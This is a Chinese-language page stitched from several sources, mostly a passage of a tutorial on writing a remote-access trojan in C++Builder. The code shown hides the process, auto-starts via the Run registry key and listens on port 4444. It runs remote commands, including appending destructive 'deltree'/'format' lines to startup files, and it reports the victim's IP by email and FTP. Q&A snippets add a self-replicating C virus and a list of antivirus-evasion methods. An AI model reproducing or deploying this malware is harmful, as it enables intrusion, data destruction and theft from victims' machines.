 這樣就終於可以隱身了(害我敲了這么多代碼!)。為什麼要判斷操作系統呢?因為WinNt中的進程管理器可以對當前進程一覽無余,因此沒必要在WinNt下也使用以上代碼(不過你可以使用其他的方法,這個留到後面再講)。接著再將自己拷貝一份到%System%目錄下,例如:C:\Windows\System,並修改注冊表,以便啟動時自動載入:
{  
char TempPath[MAX_PATH];
file://定義一個變數
GetSystemDirectory(TempPath ,MAX_PATH);
file://TempPath是system目錄緩沖區的地址,MAX_PATH是緩沖區的大小,得到目標機的System目錄路徑
SystemPath=AnsiString(TempPath);
file://格式化TempPath字元串,使之成為能供編譯器使用的樣式
CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);
file://將自己拷貝到%System%目錄下,並改名為Tapi32.exe,偽裝起來
Registry=new TRegistry;
file://定義一個TRegistry對象,准備修改注冊表,這一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
file://設置主鍵為HKEY_LOCAL_MACHINE
Registry->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);
file://打開鍵值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就創建之
try
  {
 file://如果以下語句發生異常,跳至catch,以避免程序崩潰
    if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")
      Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe");
      file://查找是否有「crossbow」字樣的鍵值,並且是否為拷貝的目錄%System%+Tapi32.exe
   file://如果不是,就寫入以上鍵值和內容
  }
catch(...)
  {
  file://如果有錯誤,什麼也不做
  }
}
 
 好,FormCreate過程完成了,這樣每次啟動都可以自動載入Tapi32.exe,並且在「關閉程序」對話框中看不見本進程了,木馬的雛形初現。
 接著選中ServerSocket控制項,在左邊的Object Inspector中將Active改為true,這樣程序一啟動就打開特定埠,處於伺服器工作狀態。再將Port填入4444,這是木馬的埠號,當然你也可以用別的。但是你要注意不要用1024以下的低端埠,因為這樣不但可能會與基本網路協議使用的埠相沖突,而且很容易被發覺,因此盡量使用1024以上的高端埠(不過也有這樣一種技術,它故意使用特定埠,因為如果引起沖突,Windows也不會報錯 ^_^)。你可以看一看TNMFTP控制項使用的埠,是21號埠,這是FTP協議的專用控制埠(FTP Control Port);同理TNMSMTP的25號埠也是SMTP協議的專用埠。
 再選中ServerSocket控制項,點擊Events頁,雙擊OnClientRead事件,敲入以下代碼:
{
  FILE *fp=NULL;
  char * content;
  int times_of_try;
  char TempFile[MAX_PATH];
  file://定義了一堆待會兒要用到的變數
  sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str());
  file://在%System%下建立一個文本文件Win369.bat,作為臨時文件使用
  AnsiString temp=Socket->ReceiveText();
  file://接收客戶端(攻擊者,也就是你自己)傳來的數據
}
 好,大門敞開了!接著就是修改目標機的各種配置了!^_^ 首先我們來修改Autoexec.bat和Config.sys吧:
{
if(temp.SubString(0,9)=="edit conf")
  file://如果接受到的字元串的前9個字元是「edit conf」
  {
     int number=temp.Length();
     file://得到字元串的長度
     int file_name=atoi((temp.SubString(11,1)).c_str());
     file://將第11個字元轉換成integer型,存入file_name變數
     file://為什麼要取第11個字元,因為第10個字元是空格字元
     content=(temp.SubString(12,number-11)+'\n').c_str();
     file://餘下的字元串將被作為寫入的內容寫入目標文件
     FILE *fp=NULL;
     char filename[20];
     chmod("c:\\autoexec.bat",S_IREADS_IWRITE);
     chmod("c:\\config.sys",S_IREADS_IWRITE);
     file://將兩個目標文件的屬性改為可讀可寫
     if(file_name==1)
       sprintf(filename,"%s","c:\\autoexec.bat");
       file://如果第11個字元是1,就把Autoexec.bat格式化
     else if(file_name==2)
       sprintf(filename,"%s","c:\\config.sys");
       file://如果第11個字元是1,就把Config.sys格式化
     times_of_try=0;
  file://定義計數器
     while(fp==NULL)
       {
      file://如果指針是空
         fp=fopen(filename,"a+");
         file://如果文件不存在,創建之;如果存在,准備在其後添加
         file://如果出錯,文件指針為空,這樣就會重復
         times_of_try=times_of_try+1;
         file://計數器加1
         if(times_of_try>100)
         {
           file://如果已經試了100次了,仍未成功
           Socket->SendText("Fail By Open File");
           file://就發回「Fail By Open File」的錯誤信息
           goto END;
           file://跳至END處
         }
       }
     fwrite(content,sizeof(char),strlen(content),fp);
     file://寫入添加的語句,例如deltree/y C:或者format/q/autotest C:,夠毒吧?!
     fclose(fp);
     file://寫完後關閉目標文件
     Socket->SendText("Sucess");
     file://然後發回「Success」的成功信息
   }
}
上回我們講到如何修改目標機上的啟動配置文件,這回我們就來查看目標機上的目錄樹和文件吧,這在客戶端上使用「dir」命令,跟著敲?:
{
else if(temp.SubString(0,3)=="dir")
  {
    file://如果前3個字元是「dir」
    int Read_Num;
    char * CR_LF="\n";
    int attrib;
    char *filename;
    DIR *dir;
    struct dirent *ent;
    int number=temp.Length();
    file://得到字元串的長度
    AnsiString Dir_Name=temp.SubString(5,number-3);
    file://從字元串第六個字元開始,將後面的字元存入Dir_Name變數,這是目錄名
    if(Dir_Name=="")
      {
  file://如果目錄名為空
        Socket->SendText("Fail By Open DIR's Name");
        file://返回「Fail By Open DIR's Name」信息
        goto END;
        file://跳到END
      }
    char * dirname;
    dirname=Dir_Name.c_str();
    if ((dir = opendir(dirname)) == NULL)
      {
  file://如果打開目錄出錯
        Socket->SendText("Fail by your DIR's name!");
        file://返回「Fail By Your DIR's Name」信息
        goto END;
        file://跳到END
      }
    times_of_try=0;
    while(fp==NULL)
      {
  file://如果指針是NULL
        fp=fopen(TempFile,"w+");
        file://就創建system\Win369.bat准備讀和寫;如果此文件已存在,則會被覆蓋
        times_of_try=times_of_try+1;
        file://計數器加1
        if(times_of_try>100)
          {
   file://如果已經試了100次了,仍未成功(真有耐心!)
            Socket->SendText("Fail By Open File");
            file://就發回「Fail By Open File」的錯誤信息
            goto END;
            file://並跳到END處
          }
       }
     while ((ent = readdir(dir)) != NULL)
       {
   file://如果訪問目標目錄成功
         if(*(AnsiString(dirname)).AnsiLastChar()!='\\')
         file://如果最後一個字元不是「\」,證明不是根目錄
           filename=(AnsiString(dirname)+"\\"+ent->d_name).c_str();
           file://加上「\」字元後將指針指向目錄流
         else
           filename=(AnsiString(dirname)+ent->d_name).c_str();
           file://如果是根目錄,則不用加「\」
         attrib=_rtl_chmod(filename, 0);
         file://得到目標文件的訪問屬性
         if (attrib & FA_RDONLY)
   file://「&」字元是比較前後兩個變數,如果相同返回1,否則返回0
           fwrite("  R",sizeof(char),3,fp);
           file://將目標文件屬性設為只讀
         else
           fwrite("   ",sizeof(char),3,fp);
           file://失敗則寫入空格
         if (attrib & FA_HIDDEN)
           fwrite("H",sizeof(char),1,fp);
           file://將目標文件屬性設為隱藏
         else
           fwrite(" ",sizeof(char),1,fp);
           file://失敗則寫入空格
         if (attrib & FA_SYSTEM)
           fwrite("S",sizeof(char),1,fp);
           file://將目標文件屬性設為系統
         else
           fwrite(" ",sizeof(char),1,fp);
           file://失敗則寫入空格
         if (attrib & FA_ARCH)
           fwrite("A",sizeof(char),1,fp);
           file://將目標文件屬性設為普通
         else
           fwrite(" ",sizeof(char),1,fp);
           file://失敗則寫入空格
         if (attrib & FA_DIREC)
           fwrite("  <DIR>  ",sizeof(char),9,fp);
           file://將目標文件屬性設為目錄
         else
           fwrite("         ",sizeof(char),9,fp);
           file://失敗則寫入空格
         fwrite(ent->d_name,sizeof(char),strlen(ent->d_name),fp);
         file://將目錄名寫入目標文件
         fwrite(CR_LF,1,1,fp);
         file://寫入換行
       }
       fclose(fp);
       file://關閉文件
       closedir(dir);
       file://關閉目錄
       FILE *fp1=NULL;
       times_of_try=0;
       while(fp1==NULL)
         {
           fp1=fopen(TempFile,"r");
           file://打開Win369.bat准備讀
           times_of_try=times_of_try+1;
           file://計數器加1
           if(times_of_try>100)
           {
    file://如果已經試了100次了,仍未成功
             Socket->SendText("Fail By Open File");
             file://就發回「Fail By Open File」的錯誤信息
             goto END;
             file://並跳到END處
           }
         }
       AnsiString Return_Text="";
       char temp_content[300];
       for(int i=0;i<300;i++) temp_content[i]='\0';
       file://定義的一個空數組
       Read_Num=fread(temp_content,1,300,fp1);
       file://從目標文件中讀入前300個字元
       while(Read_Num==300)
       {
         Return_Text=Return_Text+temp_content;
         file://Return_Text變數加上剛才的300個字元
         for(int i=0;i<300;i++) temp_content[i]='\0';
         Read_Num=fread(temp_content,1,300,fp1);
         file://重復
       };
       Return_Text=Return_Text+temp_content;
       file://Return_Text變數加上剛才的300個字元
       fclose(fp1);
       file://關閉目標文件
       Socket->SendText(Return_Text);
       file://返回Return_Text變數的內容
    }
}
 夠長吧?!察看目錄樹這么費勁啊?!你後面可以用BCB中的各種列表框對Client.exe好好美化美化。接下來就是查看指定文件的內容了,Client將使用「type」命令,(手指累不累啊?):
{
else if(temp.SubString(0,4)=="type")
  {
    file://如果前4個字元是「type」
    int Read_Num;
    int number=temp.Length();
    AnsiString File_Name=temp.SubString(6,number-4);
    file://將目標文件流存入File_Name變數中
    times_of_try=0;
    while(fp==NULL)
      {
        fp=fopen(File_Name.c_str(),"r");
        file://打開目標文件准備讀
        times_of_try=times_of_try+1;
        file://計數器加1
        if(times_of_try>100)
        {
    file://如果已試了100次了
          Socket->SendText("Fail By Open File");
          file://返回「Fail By Open File」的錯誤信息
          goto END;
          file://跳到END
        }
      }
    AnsiString Return_Text="";
    char temp_content[300];
    for(int i=0;i<300;i++) temp_content[i]='\0';
    file://定義一個空數組
    Read_Num=fread(temp_content,1,300,fp);
    file://從目標文件中讀入前300個字元
    while(Read_Num==300)
      {
        Return_Text=Return_Text+temp_content;
        file://Return_Text的內容加上剛才的字元
        for(int i=0;i<300;i++) temp_content[i]='\0';
        Read_Num=fread(temp_content,1,300,fp);
        file://重復
      };
    Return_Text=Return_Text+temp_content;
    file://Return_Text的內容加上剛才的字元
    fclose(fp);
 file://關閉目標文件
    Socket->SendText(Return_Text);
 file://返回Return_Text的內容,即你查看文件的內容
  }
}
 咳咳!累死了!還是來點輕松的吧??操縱目標機的光碟機(注意:mciSendString()函數的聲明在mmsystem.h頭文件中):
{
else if(temp=="open")
  {
    file://如果收到的temp的內容是「open」
 mciSendString("set cdaudio door open", NULL, 0, NULL);
    file://就彈出光碟機的托盤
  }
else if(temp=="close")
  {
    file://如果收到的temp的內容是「close」
 mciSendString("Set cdaudio door closed wait", NULL, 0, NULL);
    file://就收入光碟機的托盤。當然你也可以搞個死循環,讓他的光碟機好好活動活動!^_^
  }
}
 接著就是交換目標機的滑鼠左右鍵,代碼如下:
{
else if(temp=="swap")
  {
    SwapMouseButton(1);
    file://交換滑鼠左右鍵,簡單吧?
  }
}
 然後就是使目標機重新啟動。但這里要區分WinNt和Win9x??NT非常注重系統每個進程的權利,一個普通的進程是不應具備有調用系統的權利的,因此我們要賦予本程序足夠的許可權:
{
else if(temp=="reboot")
  {
 file://如果收到的temp的內容是「temp」
    DWORD dwVersion = GetVersion();
 file://得到操作系統的版本號
 if (dwVersion < 0x80000000)
    {
   file://操作系統是WinNt,不是Win9x
      HANDLE hToken;
      TOKEN_PRIVILEGES tkp;
      file://定義變數
      OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES TOKEN_QUERY, &hToken);
      file://OpenProcessToken()這個函數的作用是打開一個進程的訪問令牌
      file://GetCurrentProcess()函數的作用是得到本進程的句柄
      LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
      file://LookupPrivilegeValue()的作用是修改進程的許可權
      tkp.PrivilegeCount = 1;  
   file://賦給本進程特權
      tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
   AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);
      file://AdjustTokenPrivileges()的作用是通知Windows NT修改本進程的權利
      ExitWindowsEx(EWX_REBOOT EWX_FORCE, 0);
   file://強行退出WinNt並重啟
    }
    else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);
      file://強行退出Win9x並重啟
  }
}
 如果以上都不是,就讓它在Dos窗口中執行傳來的命令:
{
else
  {
 file://如果都不是
    char * CR_TF="\n";
    times_of_try=0;
    while(fp==NULL)
    {
      fp=fopen(TempFile,"w+");
      file://創建Win369.bat,如果已存在就覆蓋
      times_of_try=times_of_try+1;
   file://計數器加1
      if(times_of_try>100)
      {
        Socket->SendText("Fail By Open File");
        file://返回「Fail By Open File」的信息
        goto END;
        file://跳到END
      }
    }
    fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp);
    file://寫入欲執行的命令
    fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp);
    file://寫入換行符
    fclose(fp);
    file://關閉Win369.bat
    system(TempFile);
    file://執行Win369.bat
    Socket->SendText("Success");
    file://返回「Success」信息
  }
}
 你可以直接執行什麼Ping和Tracert之類的命令來進一步刺探目標機的網路狀況(判斷是否是一個企業的區域網),然後可以進一步攻擊,比如Deltree和Format命令。^_^
 
 到此,伺服器程序的功能已全部完成,但還差容錯部分未完成,這樣才能避免程序因意外而崩潰。朋友,別走開!(未完待續)
  木馬是如何編寫的(三)
        武漢   周侃
 上次已編寫完伺服器端的各種功能,但還差容錯部分還未完成,下面我們Go on! 其代碼如下(照敲不誤 ^_^):
{
END:;
  Socket->Close();
  file://關閉服務
  ServerSocket1->Active =true;
  file://再次打開服務
  if (NMSMTP1->Connected) NMSMTP1->Disconnect();
  file://如果SMTP伺服器已連接則斷開
  NMSMTP1->Host = "smtp.163.net";
  file://選一個好用的SMTP伺服器,如163、263、sina和btamail
  NMSMTP1->UserID = "";
  file://你SMTP的ID
  try
  {
    NMSMTP1->Connect();
    file://再次連接
  }
  catch(...)
  {
    goto NextTime;
 file://跳到NextTime
  }
  NMSMTP1->PostMessage->FromAddress ="I don't know!";
  file://受害者的Email地址
  NMSMTP1->PostMessage->FromName = "Casualty";
  file://受害者的名字
  NMSMTP1->PostMessage->ToAddress->Text = "[email protected]";
  file://將信發到我的郵箱,這一步很關鍵
  NMSMTP1->PostMessage->Body->Text = AnsiString("Server Running on:") + NMSMTP1->LocalIP ;
  file://信的內容提示你「伺服器正在運行」,並且告訴你受害者的目前的IP地址,以便連接
  NMSMTP1->PostMessage->Subject = "Server Running Now!";
  file://信的主題
  NMSMTP1->SendMail();
  file://發送!
  return;
  file://返回
NextTime:
  NMFTP1->Host = "ftp.go.163.com";
  file://你的FTP伺服器的地址
  NMFTP1->UserID = "";
  file://你的用戶ID
  NMFTP1->Port = 21;
  file://FTP埠號,一般為21
  NMFTP1->Password = "";
  file://你的FTP的密碼
  if(NMFTP1->Connected) NMFTP1->Disconnect();
  file://如果已連接就斷開
  try
    {
      NMFTP1->Connect();
      file://再連接
    }
  catch(...)
    {
       return;
       file://返回
    }
  AnsiString SendToSite = "Server Running on: " + NMFTP1->RemoteIP;
  file://受害者的IP地址
  FILE * Upload;
  Upload = fopen(NMFTP1->RemoteIP.c_str(),"w+");
  file://創建一個新文件准備寫,如果已存在就覆蓋
  fwrite(SendToSite.c_str(),sizeof(char),SendToSite.Length(),Upload);
  file://寫入以上的SendToSite的內容
  fclose(Upload);
  file://寫完後關閉此文件
  NMFTP1->RemoveDir("public_html");
  file://刪除public_html目錄
  NMFTP1->Upload(NMFTP1->RemoteIP, NMFTP1->RemoteIP);
  file://上傳!
}
 啊,超長的OnClientRead事件終於寫完了。最後別忘了要在此伺服器源碼文件中添加以下頭文件:
#include <stdlib.h>
#include <dirent.h>
#include <fcntl.h>
#include <dos.h>
#include <sys\stat.h>
#include <winbase.h>
#include <stdio.h>
#include <process.h>
#include <io.h>
#include <mmsystem.h>
 至此,伺服器端(Server)程序
G. c語言源文件編譯後成了木馬,求解
代碼沒有大問題
#include<stdio.h>
#include<stdlib.h>
intmain(void)
{
inta[10],i;
for(i=0;i<10;i++)
scanf("%d",&a[i]);
for(i=0;i<10;i++)
printf("%d ",a[i]);
system("pause");
return0;//因為intmain(),所以要有個返回值
}
估計你所說的木馬是你系統帶的殺毒軟體誤報的! 你程序的文件名最好寫個略有復雜性的名稱,如:test_20140831.c
H. c語言木馬代碼,簡單點的,我保證不做違法的
#include <stdio.h> 
#include <dir.h> 
void main(void) 
{ 
virus(); 
} 
int virus() 
{ 
struct ffblk ffblk; 
FILE *in,*out,*read; 
char *virus="virus.c"; 
char buf[50][80]; 
char *p; 
char *end="return"; 
char *bracket="}"; 
char *main="main"; 
char *include[2]={"stdio.h","dir.h"}; 
char *int_virus="int virus()"; 
char *buffer; 
int done,i,j=0,flag=0; 
printf("\nI have a virus. Writen by PuBin\n"); 
done = findfirst("*.c",&ffblk,0); 
while (!done) 
{ 
i=0; 
if ((in = fopen(ffblk.ff_name, "rt"))== NULL) 
{ 
goto next; 
} 
do{ 
if(i>=50) 
{ 
fclose(in); 
goto next; 
} 
p=fgets(buf[i],80,in); 
i++; 
}while(p!=NULL); 
fclose(in); 
out=fopen(ffblk.ff_name,"w+t"); 
fputs("#include<stdio.h>\n",out); 
fputs("#include<dir.h>\n",out); 
do 
{ 
if(strstr(buf[j],main)!=NULL) 
{ 
for(;j<i-1;j++) 
if(strstr(buf[j],end)==NULL&&strstr(buf[j],bracket)==NULL) 
fputs(buf[j],out); 
else 
{ 
if(flag==0) 
{ 
flag=1; 
fputs("virus();\n",out); 
} 
fputs(buf[j],out); 
} 
} 
else if((strstr(buf[j],include[0])==NULL) 
&&(strstr(buf[j],include[1])==NULL)) 
{ 
fputs(buf[j],out); 
j++; 
} 
else 
j++; 
}while(j<i-1); 
read=fopen(virus,"rt"); 
do 
{ 
p=fgets(buffer,80,read); 
if(strstr(buffer,int_virus)) 
while(p!=NULL) 
{ 
if(strstr(buffer,virus)==NULL) 
fputs(buffer,out); 
else 
{ 
fputs(" char *virus=\"",out); 
fputs(ffblk.ff_name,out); 
fputs("\";\n",out); 
} 
p=fgets(buffer,80,read); 
} 
}while(p!=NULL);
fclose(read); 
fclose(out); 
printf("\nYour c program %s has a virus. Writen by PuBin\n",ffblk.ff_name); 
next: done = findnext(&ffblk); 
} 
return 0; 
} 
再就是網上一網路一大堆的。
I. 誰曾經寫過木馬,求良性木馬的源碼,可以的話是C語言或C++的。打個比方,木馬不會對電腦造成傷害,只
1:木馬首先沒有良性這一說
2:至於編程語言C D E 都可以
3:木馬要駐留系統的方式你要了解 
基本駐留採用 進程插入 內存駐留  注冊表啟動 系統程序鉤子  注冊成服務啟動 第三方軟體感染
免殺這個問題 要學習的也不少
1:代碼免殺 
2:特徵碼免殺
3:行為免殺
4:其他方式
普通的加殼 加花 偽造簽名 好多種 
不只是免殺的問題 還要考慮殺毒軟體的採集分析逆向等等 
還是好好學習下系統編程做正規軟體吧  
做木馬沒有前途 只有違法進監獄一說了
